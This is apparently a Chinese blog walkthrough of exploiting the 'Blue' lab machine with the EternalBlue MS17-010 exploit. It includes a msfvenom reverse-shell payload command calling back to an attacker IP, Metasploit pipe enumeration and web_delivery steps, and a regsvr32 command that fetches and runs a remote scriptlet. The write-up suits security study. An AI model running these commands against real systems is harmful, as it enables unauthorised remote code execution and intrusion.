美文网首页
Blue(永恒之蓝)

Blue(永恒之蓝)

作者: __周__ | 来源:发表于2020-02-24 10:03 被阅读0次

    nmap扫描发现139,445端口开启,再加上靶机名叫blue,很容易想到17-010

    图片.png

    直接改17-010的py脚本
    Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)

    把原来注释的两行,改改

    图片.png

    同时我们需要生产一个exe文件,来让目标靶机执行
    msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.14.5 lport=5678 -f exe > /tmp/exp.exe

    存放的路径要跟脚本的路径对应起来

    脚本执行的时候,需要有pipe name,用来把exe文件传到靶机上

    msf中的auxiliary/scanner/smb/pipe_auditor模块,可以扫描到开放的pipe

    msf5 auxiliary(scanner/smb/pipe_auditor) > exploit
    
    [+] 10.10.10.40:445       - Pipes: \netlogon, \lsarpc, \samr, \browser, \atsvc, \epmapper, \eventlog, \InitShutdown, \keysvc, \lsass, \LSM_API_ser             vice, \ntsvcs, \plugplay, \protected_storage, \scerpc, \srvsvc, \trkwks, \wkssvc
    [*] 10.10.10.40:          - Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
    
    

    执行脚本,并且从pipe扫描中随便拿一个用,同时另外一边开启nc监听
    python 42315.py 10.10.10.40 lsarpc

    图片.png

    还有另一正思路,虽然没成功

    直接让目标靶机执行命令

    图片.png
    use exploit/multi/script/web_delivery
    set target 3
    set payload windows/meterpreter/bind_tcp
    set rhost 10.10.10.40
    exploit
    
    regsvr32 /s /n /u /i:regsvr32 /s /n /u /i:http://10.10.14.5:9999/xE1H8gb6.sct scrobj.dll
    

    相关文章

      网友评论

          本文标题:Blue(永恒之蓝)

          本文链接:https://www.haomeiwen.com/subject/zrpsqhtx.html